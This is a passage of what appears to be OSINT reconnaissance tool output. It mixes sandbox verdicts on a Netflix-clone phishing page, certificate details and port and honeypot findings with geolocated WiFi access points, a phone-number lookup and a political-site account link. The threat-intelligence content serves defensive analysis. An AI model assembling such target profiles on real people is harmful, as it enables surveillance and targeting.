u'origin': u'File/Memory', u'identifier': u'string-154', u'name': u'Found suspicious keywords in script (string)', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Observed keyword:"ActiveXObject" [Source: analytics_1_.js]\n Observed keyword:"ActiveXObject" [Source: jq-ui-flplayer-sw-aggregated_1_.js]\n Observed keyword:".Run" [Source: 00000000-00002916.00000000.67483.02150000.00000002.mdmp\n 00000000-00002916.00000000.67527.02150000.00000002.mdmp]'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"transportUrl:b,context:c},J(91);else{var f="/gtag/destination?id="+encodeURIComponent(a)+"&l="+je.ca+"&cx=c";Go()&&(f+="&sign="+je.Sd);var g=se||ue?Fo(b,f):void 0;g||(g=rl("https://","http://",je.jd+f));di().destination[a]={state:1,context:c};Hb(g)}};function Ho(){if(Zh()){return!0}return!1};var Ko=new RegExp(/^(.*\\.)?(google|youtube|blogger|withgoogle)(\\.com?)?(\\.[a-z]{2})?\\.?$/),Lo={cl:["ecl"],customPixels:["nonGooglePixels"],ecl:["cl"],ehl:["hl"],hl:["ehl"],html:["customScripts","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],customScripts:["html","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],nonGooglePixels:[],nonGoogleScripts:["nonGooglePixels"],nonGoogleIframes:["nonGooglePixels"]},Mo={cl:["ecl"],customPixels:["customScripts","html"]," (Indicator: "youtube")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "thumb-5_1_.jpg" has type "JPEG image data JFIF standard 1.02 aspect ratio density 100x100 segment length 16 baseline precision 8 40x40 components 3"- [targetUID: N/A]\n "~DFFE60A6B95FE0E2E6.TMP" has type "data"- Location: [%TEMP%\\~DFFE60A6B95FE0E2E6.TMP]- [targetUID: 00000000-00002796]\n "slide-1_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 72x72 segment length 16 baseline precision 8 600x250 components 3"- [targetUID: N/A]\n "jq-ui-flplayer-sw-aggregated_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "dl-macosx_1_.png" has type "PNG image data 60 x 40 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "XCL1KF20.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\XCL1KF20.txt]- [targetUID: 00000000-00003580]\n "js_2_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "all_1_.css" has type "ASCII text"- [targetUID: N/A]\n "RecoveryStore._9738A693-C3A3-11ED-9D1F-0800272BE4CA_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "slide-3_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 72x72 segment length 16 baseline precision 8 600x250 components 3"- [targetUID: N/A]\n "42BV46U1.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\42BV46U1.txt]- [targetUID: 00000000-00003580]\n "slide-2_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 72x72 segment length 16 baseline precision 8 600x250 components 3"- [targetUID: N/A]\n "7RO40XI5.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\7RO40XI5.txt]- [targetUID: 00000000-00002796]\n "~DFDA73984BBB04A3BA.TMP" has type "data"- Location: [%TEMP%\\~DFDA73984BBB04A3BA.TMP]- [targetUID: 00000000-00002796]\n "_9738A695-C3A3-11ED-9D1F-0800272BE4CA_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "bg-l_1_.jpg" has type "JPEG image data JFIF standard 1.02 aspect ratio density 100x100 segment length 16 baseline precision 8 113x181 components 3"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "dl-windows_1_.png" has type "PNG image data 60 x 40 8-bit/color RGBA non-interlaced"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"stellarium.org" seems to be random'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "jquery.org/license"\n Pattern match: "https://stats.g.doubleclick.net/j/collect"\n Pattern match: "https://ampcid.google.com/v1/publisher:getClientId"\n Pattern match: "http://static.flowplayer.org/swf/expressinstall.swf,cachebusting:true},t"\n Pattern match: "https://cct.google/taggy/agent.js"\n Pattern match: "http://www.gnu.org/licenses/"\n Pattern match: "http://jqueryui.com/about"\n Pattern match: "http://docs.jquery.com/UI"\n Pattern match: "http://docs.jquery.com/UI/Effects/"\n Pattern match: "http://docs.jquery.com/UI/Mouse"\n Pattern match: "http://docs.jquery.com/UI/Position"\n Pattern match: "http://docs.jquery.com/UI/Widget"\n Pattern match: "http://jquery.com/"\n Pattern match: "http://jquery.org/license"\n Pattern match: "http://sizzlejs.com/"\n Pattern match: "MUID2D2A9A2C4664691E26D188FA47286894msn.com/1025218105305631099439219419004131020976*"\n Pattern match: ".2.1166814548.1678934302stellarium.org/1088135761420831167827160715879131020976*"\n Pattern match: ".2.1166814548.1678934302stellarium.org/1088135761420831167827160715879131020976*_gidGA1.2.164760106.1678934302stellarium.org/1088231157260831021177160731504131020976*"\n Pattern match: ".2.1166814548.1678934302stellarium.org/1088135761420831167827160715879131020976*_gidGA1.2.164760106.1678934302stellarium.org/1088231157260831021177160731504131020976*_gat_gtag_UA_109850660_11stellarium.org/1088219999910431020976160778379131020976*"\n Pattern match: "https://www.google.com/ads/ga-audiences,a.google,c"\n Pattern match: "https://stats.g.doubleclick.net/j/collect,ca.U,ca"\n Pattern match: "https://www.google-analytics.com/analytics.js,k=c.F?pp(R(c,gaFunctionName)):pp();if(pa(k)){var"\n Pattern match: "https://+c"\n Pattern match: "www.google-analytics.com==a.host&&(a.port||b)==b&&D(a.path,/plugins/)?!0:!1},ne=function(a){var"\n Pattern match: "www.google-analytics.com},Ge=function(a){switch(a){default:case"\n Pattern match: "https://tagassistant.google.com/"\n Pattern match: "https://+g | 185.199.111.153 |
| 2023-05-12 02:50:48 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://nickcher.github.io/netflix_landing_clone/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_b0c_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_b0c_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2828"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_b0c_IESQMMUTEX_0_303"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_b0c_IESQMMUTEX_0_331"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_b0c_IE_EarlyTabStart_0xda0_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_b0c_ConnHashTable<2828>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2828"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"\n "172.96.160.210:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"i.ibb.co"\n "nickcher.github.io"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "Watch right on Netflix.com." (Indicator: "dir "; File: "netflix_landing_clone_1_.htm")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"background_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "tab-content-2-1_1_.png" has type "PNG image data 561 x 379 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-2-3_1_.png" has type "PNG image data 552 x 338 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-1_1_.png" has type "PNG image data 915 x 649 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-2-2_1_.png" has type "PNG image data 488 x 312 8-bit/color RGBA non-interlaced" and extension "png"\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "background_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "tab-content-2-1_1_.png" has type "PNG image data 561 x 379 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-2-3_1_.png" has type "PNG image data 552 x 338 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-1_1_.png" has type "PNG image data 915 x 649 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-2-2_1_.png" has type "PNG image data 488 x 312 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "Cab26D3.tmp" has type "data"- Location: [%TEMP%\\Cab26D3.tmp]- [targetUID: 00000000-00003584]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002828]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF64A1F5312060F4AE.TMP" has type "data"- Location: [%TEMP%\\~DF64A1F5312060F4AE.TMP]- [targetUID: 00000000-00002828]\n "~DFC2B27440F7A0B15C.TMP" has type "data"- Location: [%TEMP%\\~DFC2B27440F7A0B15C.TMP]- [targetUID: 00000000-00002828]\n "~DF0A3D913D5F45CD6B.TMP" has type "data"- Location: [%TEMP%\\~DF0A3D913D5F45CD6B.TMP]- [targetUID: 00000000-00002828]\n "~DF87F80C8C1C5AD9DE.TMP" has type "data"- Location: [%TEMP%\\~DF87F80C8C1C5AD9DE.TMP]- [targetUID: 00000000-00002828]\n "urlref_httpsnickcher.github.ionetflix_landing_clone" has type "HTML document UTF-8 Unicode text"- [targetUID: N/A]\n "style_1_.css" has type "assembler source ASCII text"- [targetUID: N/A]\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "RecoveryStore._B6073E9B-EF99-11ED-BFDF-0800272E71EF_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_C011B3B6-EF99-11ED-BFDF-0800272E71EF_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_B6073E9D-EF99-11ED-BFDF-0800272E71EF_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "script_1_.js" has type "ASCII text"- [targetUID: N/A]\n "NUC70NVO.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\NUC70NVO.txt]- [targetUID: 00000000-00003584]\n "W4NLV9B9.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\W4NLV9B9.txt]- [targetUID: 00000000-00002828]\n "9UXBXI81.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\9UXBXI81.txt]- [targetUID: 00000000-00002828]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003584]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]\n "LO9MJJD0.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\LO9MJJD0.txt]- [targetUID: 00000000-00003584]\n "6YRDU7V9.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\6YRDU7V9.txt]- [targetUID: 00000000-00002828]\n "G0VQDCLZ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\G0VQDCLZ.txt]- [targetUID: 00000000-00002828]\n "GUUOB0ON.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\GUUOB0ON.txt]- [targetUID: 00000000-00002828]\n "Cab281E.tmp" has type "data"- Location: [%TEMP%\\Cab281E.tmp]- [targetUID: 00000000-00003584]\n "Cab2833.tmp" has type "data"- Location: [%TEMP%\\Cab2833.tmp]- [targetUID: 00000000-00003584]\n "Cab2E9E.tmp" has type "data"- Location: [%TEMP%\\Cab2E9E.tmp]- [targetUID: 00000000-00003584]\n "Cab2821.tmp" has type "data"- Location: [%TEMP%\\Cab2821.tmp]- [targetUID: 00000000-00003584]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003584]\n "Cab281D.tmp" has type "data"- Location: [%TEMP%\\Cab281D.tmp]- [targetUID: 00000000-00003584]\n "netflix_landing_clone_1_.htm" has type "HTML document UTF-8 Unicode text"- [targetUID: N/A]\n "favicon_4_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://nickcher.github.io/netflix_landing_clone/"\n Pattern match: "https://nickcher.github.io"\n Pattern match: "https://nickcher.github.io/netflix_landing_clone"\n Pattern match: "http://www.w3.org/1999/02/22-rdf-syntax-ns#"\n Pattern match: "mzjdL.VS/oLORCm/~H.c0KNw&FGk~Z2C3[f"\n Pattern match: "www.microsoft.com/pkiops/certs/Microsoft%20Azure%20TLS%20Issuing%20CA%2002%20-%20xsign.crt0-!http://oneocsp.microsoft.com/ocsp05E9R"\n Pattern match: "https://i.ibb.co/r5krrdz/logo.png"\n Pattern match: "https://i.ibb.co/vXqDmnh/background.jpg"\n Pattern match: "SUIDmicrosoft.com/9216418687628831032347268501117031032230MUID09E339F3135660E63EB22AFD12D26110microsoft.com/ | 185.199.108.153 |
| 2023-05-12 02:44:16 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:d7:56:4b:39:cd:63:5b:72:07:1e:ba:15:c9:f7:2c:e7:33
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Apr 24 04:50:12 2023 GMT
Not After : Jul 23 04:50:11 2023 GMT
Subject: CN=oldfluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:82:cb:77:ee:0a:02:15:cc:55:bf:00:98:6f:a8:
3f:b2:14:d4:9c:d2:64:fd:99:e1:d8:26:89:b8:f1:
dc:22:d0:26:9d:8e:a5:23:7c:46:6d:03:ff:6a:e6:
a2:08:ce:de:84:74:8f:ae:3e:dc:7e:26:40:72:7b:
57:ec:43:06:6a:71:6c:fc:31:f4:5e:75:d1:19:14:
5e:39:a9:c9:25:dc:c7:ab:fb:78:13:e9:b6:dd:4e:
22:f5:46:61:9b:4d:92:18:51:63:9f:47:d1:e0:56:
d2:dd:ee:e2:20:b3:7b:38:70:5e:c4:ce:34:85:6e:
20:54:d9:a0:fd:9c:5b:f3:2b:f0:71:40:e4:40:4b:
1e:0f:24:1b:6d:0c:b5:2f:db:ff:c9:99:df:c5:b7:
e3:7b:82:94:fd:3b:73:58:54:64:ee:2f:77:1b:b4:
c2:f6:38:26:30:8a:32:cc:d3:34:07:56:0c:a8:1d:
b3:55:51:77:90:73:0f:96:7f:80:56:ed:10:db:b0:
4f:75:85:22:ed:37:00:ed:d3:cd:b1:63:f5:f1:51:
be:1d:fc:12:12:48:53:55:50:e7:d9:8d:97:f2:49:
cd:d8:c7:68:76:42:1f:19:5e:47:61:6c:1c:99:ed:
d8:16:c4:32:36:77:d5:1b:79:9e:1e:4e:47:15:7c:
27:6f
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
18:EC:9F:C5:4F:26:93:D3:4A:02:0B:79:BA:BB:F3:33:18:F7:3E:35
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:oldfluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
95:2c:18:1f:d0:91:73:33:88:ab:4e:68:d6:e3:58:9c:45:64:
b3:8a:0d:c0:05:28:dd:e1:2b:f4:06:90:e5:1f:5e:3c:9c:82:
f8:42:f9:9c:fc:f0:39:70:2a:ec:b3:e8:e8:27:a3:e2:22:80:
9f:b5:25:f6:b8:88:47:5f:86:6d:fa:80:87:2b:27:3e:0f:10:
6e:32:3f:e2:3c:74:e0:3c:4f:db:80:e5:a0:7b:df:70:24:e5:
0b:57:3d:66:c3:68:d9:cb:10:13:bf:3d:4b:9b:bd:e4:38:dc:
16:3b:ab:a4:bb:05:4c:21:58:ec:56:01:d3:cd:f7:e4:52:ad:
1c:0c:0e:45:9d:25:b3:ee:43:f3:93:10:64:3c:d1:8d:ef:4c:
a1:a0:46:a0:9c:7a:71:16:74:1d:79:35:f7:b7:75:a9:5d:1a:
70:92:2b:c8:d4:0a:a7:04:cf:3a:2e:08:b5:53:9c:fd:91:52:
6d:bc:96:2f:53:07:7f:1a:15:71:f1:e4:9c:95:b8:03:cb:17:
25:b8:bd:2e:3d:91:c6:72:cb:50:7f:bb:42:cd:87:4e:3f:af:
01:27:cd:29:c4:cc:43:33:bb:f8:a1:ac:9f:c7:0b:d7:f6:39:
18:d3:6f:bb:a0:79:75:5a:d1:c9:35:44:91:1c:7a:a8:9d:4d:
fb:9f:95:2e
| battleb0t.xyz |
| 2023-05-12 03:01:29 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.31): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Juggernaut (Net ID: 00:0C:41:D7:E4:AF) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Ricos Loft 5 (Net ID: 00:01:9F:34:7B:CC) | 34.0544, -118.244 |
| 2023-05-12 03:09:45 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 136.97.148.34.bc.googleusercontent.com | 34.148.97.136 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Patriots Win (Category: political)
https://patriots.win/u/login/ | login |
| 2023-05-12 02:55:11 | Open UDP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:53 | 87.248.157.102 |
| 2023-05-12 03:12:52 | Raw Data from RIRs | No | numverify | 0 | 0 | 3 | 0 | None | {u'international_format': u'+14805058800', u'local_format': u'4805058800', u'number': u'14805058800', u'valid': True, u'line_type': u'landline', u'location': u'Phoenix', u'country_code': u'US', u'carrier': u'', u'country_name': u'United States of America', u'country_prefix': u'+1'} | +14805058800 |
| 2023-05-12 03:28:39 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.160:8443 | 188.114.96.0/24 |
| 2023-05-12 02:50:21 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | {u'count': 50, u'search_terms': [{u'id': u'host', u'value': u'185.199.108.153'}], u'result': [{u'environment_id': 160, u'job_id': u'645d8a88279c2a120702351f', u'analysis_start_time': u'2023-05-12 00:38:33', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'fd3f87723c83f2305810fe23fef4cf445f78d61b1bd01c5ba0f86e6abdd341d0', u'type': None, u'type_short': u'url', u'size': 66}, {u'environment_id': 160, u'job_id': u'645d49f8de4a448d8502e802', u'analysis_start_time': u'2023-05-11 20:03:05', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'caa85587541ac5a6fa3be679888d72e2e42fdcad7692d730bfdac5f1eda53cb8', u'type': None, u'type_short': u'url', u'size': 66}, {u'environment_id': 160, u'job_id': u'645d21c0b499dcb7b70d14f2', u'analysis_start_time': u'2023-05-11 17:11:29', u'vx_family': u'Malicious site', u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'da548ef9df8cab343b3862fc91c34c186e72b4b4c2ea3d2b464bc6043a235960', u'type': None, u'type_short': u'url', u'size': 53}, {u'environment_id': 160, u'job_id': u'645d0f98dcd5664d0b03879a', u'analysis_start_time': u'2023-05-11 15:54:01', u'vx_family': u'Malicious site', u'av_detect': u'33', u'environment_description': u'Windows 10 64 bit', u'threat_score': 100, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'f957cd2858479ac1c3950fe600ab6a011f2955b2cada6371078e83f2d9ce16ca', u'type': None, u'type_short': u'url', u'size': 142}, {u'environment_id': 110, u'job_id': u'645c5e23b4ad9858e30c3320', u'analysis_start_time': u'2023-05-11 03:16:52', u'vx_family': u'Phishing site', u'av_detect': u'62', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'2b8ddeb1ac7750da80502b1322e14c3de7bb618006fe7ddf37f47b9324d3bb67', u'type': None, u'type_short': u'url', u'size': 72}, {u'environment_id': 110, u'job_id': u'645c5e1fc129a37d29017ae4', u'analysis_start_time': u'2023-05-11 03:16:48', u'vx_family': u'Phishing site', u'av_detect': u'71', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'72bea1bb6678facfbacd6d43b3e50cbf0d128005c52469fd378a2c17b8a9d8e4', u'type': None, u'type_short': u'url', u'size': 66}, {u'environment_id': 110, u'job_id': u'645c5df8abfe193107024f1e', u'analysis_start_time': u'2023-05-11 03:16:09', u'vx_family': u'Phishing site', u'av_detect': u'60', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'72dcf92fdd87135607534fb22cd7cb1030bdce9f3ac073f1de1f62b3a33edf56', u'type': None, u'type_short': u'url', u'size': 69}, {u'environment_id': 110, u'job_id': u'645c5de3e95b4421cb07d72c', u'analysis_start_time': u'2023-05-11 03:15:48', u'vx_family': u'Phishing site', u'av_detect': u'58', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'bdeb520577acc7f04dc5ec8e74234521dc150dedad20f555e3db29d2afeb902f', u'type': None, u'type_short': u'url', u'size': 73}, {u'environment_id': 110, u'job_id': u'645c5de38943312361085a76', u'analysis_start_time': u'2023-05-11 03:15:48', u'vx_family': u'Phishing site', u'av_detect': u'59', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'6b9cb44f8af65c9c7de7aeefe5df75082005b066e5269a7beab8d9351e8fe0a9', u'type': None, u'type_short': u'url', u'size': 65}, {u'environment_id': 110, u'job_id': u'645c5c6fcf0b25bc970e9ca1', u'analysis_start_time': u'2023-05-11 03:09:36', u'vx_family': u'Phishing site', u'av_detect': u'61', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'be1d588c403275660b01eca90094a469c99c292f3f377a701a37fa0b2226362b', u'type': None, u'type_short': u'url', u'size': 66}, {u'environment_id': 110, u'job_id': u'645c5bf5f586b26472036a15', u'analysis_start_time': u'2023-05-11 03:07:34', u'vx_family': u'Phishing site', u'av_detect': u'61', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'0754c3a617f3c7c89ea46c89c18542dd456aee3a70b9dd31bfc459a66031bbaa', u'type': None, u'type_short': u'url', u'size': 71}, {u'environment_id': 110, u'job_id': u'645c5bb295b3d7015b0ad91e', u'analysis_start_time': u'2023-05-11 03:06:26', u'vx_family': u'Phishing site', u'av_detect': u'60', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': 